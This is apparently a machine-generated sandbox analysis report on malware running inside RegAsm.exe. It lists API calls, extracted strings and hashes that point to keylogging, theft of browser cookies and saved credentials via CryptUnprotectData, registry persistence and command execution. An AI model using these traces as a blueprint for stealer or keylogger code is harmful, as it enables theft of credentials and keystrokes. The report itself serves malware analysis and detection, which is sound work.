                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                        • String ID: @5U$XQG$NG
                                                                        • API String ID: 1634807452-2565508393
                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: `#D$`#D
                                                                        • API String ID: 885266447-2450397995
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
                                                                        • _free.LIBCMT ref: 00443540
                                                                        • _free.LIBCMT ref: 0044354A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$FileModuleName
                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        • API String ID: 2506810119-1068371695
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                        • _free.LIBCMT ref: 10004CE8
                                                                        • _free.LIBCMT ref: 10004CF2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _free$FileModuleName
                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        • API String ID: 2506810119-1068371695
                                                                        • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                        • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                        • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                        • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63A21986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                        • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                        • String ID: /sort "Visit Time" /stext "$0NG
                                                                        • API String ID: 368326130-3219657780
                                                                        • Opcode ID: c9918486698fa1facc7475353dff3b0eab899f83a18ffbf80fb8a8f949f99717
                                                                        • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                                                        • Opcode Fuzzy Hash: c9918486698fa1facc7475353dff3b0eab899f83a18ffbf80fb8a8f949f99717
                                                                        • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32 ref: 0041CAD7
                                                                          • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                                          • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                                                          • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?), ref: 004137B1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateInfoParametersSystemValue
                                                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                        • API String ID: 4127273184-3576401099
                                                                        • Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                                        • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                                                        • Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                                        • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 004162F5
                                                                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                          • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                                          • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                                          • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _wcslen$CloseCreateValue
                                                                        • String ID: !D@$@5U$okmode
                                                                        • API String ID: 3411444782-2267304325
                                                                        • Opcode ID: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
                                                                        • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                                                        • Opcode Fuzzy Hash: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
                                                                        • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                                                        APIs
                                                                          • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C688
                                                                        Strings
                                                                        • User Data\Default\Network\Cookies, xrefs: 0040C603
                                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                        • API String ID: 1174141254-1980882731
                                                                        • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                                        • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                                                        • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                                        • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                                                        APIs
                                                                          • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C757
                                                                        Strings
                                                                        • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                        • API String ID: 1174141254-1980882731
                                                                        • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                                        • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                                                        • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                                        • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                                                        APIs
                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040A20E
                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040A21A
                                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread$LocalTimewsprintf
                                                                        • String ID: Offline Keylogger Started
                                                                        • API String ID: 465354869-4114347211
                                                                        • Opcode ID: 6722521d9a354589ddfd9572c5f22cfa7bfd03d06c3fb38996f6b2f9df3dd413
                                                                        • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                                                        • Opcode Fuzzy Hash: 6722521d9a354589ddfd9572c5f22cfa7bfd03d06c3fb38996f6b2f9df3dd413
                                                                        • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                                                        APIs
                                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread$LocalTime$wsprintf
                                                                        • String ID: Online Keylogger Started
                                                                        • API String ID: 112202259-1258561607
                                                                        • Opcode ID: 9998e3ed5b0b0a24696408f27a990a726a89a8e91e885a70493f5dfbd0b772b3
                                                                        • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                                                        • Opcode Fuzzy Hash: 9998e3ed5b0b0a24696408f27a990a726a89a8e91e885a70493f5dfbd0b772b3
                                                                        • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: CryptUnprotectData$crypt32
                                                                        • API String ID: 2574300362-2380590389
                                                                        • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                        • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                                                        • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                        • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                        • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                        • SetEvent.KERNEL32(?), ref: 004051D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEventHandleObjectSingleWait
                                                                        • String ID: Connection Timeout
                                                                        • API String ID: 2055531096-499159329
                                                                        • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                                        • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                                                        • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                                        • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                                                        APIs
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Exception@8Throw
                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                        • API String ID: 2005118841-1866435925
                                                                        • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                                        • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                                                        • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                                        • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                                                        APIs
                                                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041381F
                                                                        • RegSetValueExW.ADVAPI32 ref: 0041384D
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00413858
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateValue
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 1818849710-4028850238
                                                                        • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                                        • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                                                        • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                                        • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
• String ID: bad locale name
• API String ID: 3628047217-1405518554
• Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
• Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
• Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
• Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C

APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
• FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
Strings
Memory Dump Source
• Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
Similarity
• API ID: FreeHandleLibraryModule
• String ID: CorExitProcess$mscoree.dll
• API String ID: 662261464-1276376045
• Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
• Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
• Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
• Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5

APIs
• RegOpenKeyExW.ADVAPI32 ref: 0041363D
• RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
• RegCloseKey.ADVAPI32(?), ref: 00413665
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID: @5U
• API String ID: 3677997916-921383711
• Opcode ID: f8021bfd515d837cd78af2754fa90286b7de4a0a46112e11e0f2f857281b4111
• Instruction ID: f34a781dc69553a1478c4d1e38e8143fd29b0d6f10a6f19acb5bd71dd86b2662
• Opcode Fuzzy Hash: f8021bfd515d837cd78af2754fa90286b7de4a0a46112e11e0f2f857281b4111
• Instruction Fuzzy Hash: 00F04F75600218FBDF209B90DC05FDD77BCEB04B11F1040A2BA45B5291DB749F849BA8

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free
• String ID: 0;U$2U
• API String ID: 269201875-690850028
• Opcode ID: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
• Instruction ID: d76a88c3c7e0b504eff74fb84b9f6db8507cba8af1ea4ea387731c34734dfbbf
• Opcode Fuzzy Hash: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
• Instruction Fuzzy Hash: AAE0E562A0182040F675BA3F2D05B9B49C5DB8173BF11433BF538861C1DFAC4A4251AE

APIs
• CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
• ShowWindow.USER32(00000009), ref: 00416C61
• SetForegroundWindow.USER32 ref: 00416C6D
  • Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
  • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
  • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
  • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Window$Console$Show$AllocCreateForegroundOutputThread
• String ID: !D@
• API String ID: 186401046-604454484
• Opcode ID: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
• Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
• Opcode Fuzzy Hash: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
• Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D

APIs
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ExecuteShell
• String ID: /C $cmd.exe$open
• API String ID: 587946157-3896048727
• Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
• Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
• Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
• Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659

APIs
• TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,`2U,004752F0,?,pth_unenc), ref: 0040B8BB
• UnhookWindowsHookEx.USER32 ref: 0040B8C7
• TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: TerminateThread$HookUnhookWindows
• String ID: pth_unenc
• API String ID: 3123878439-4028850238
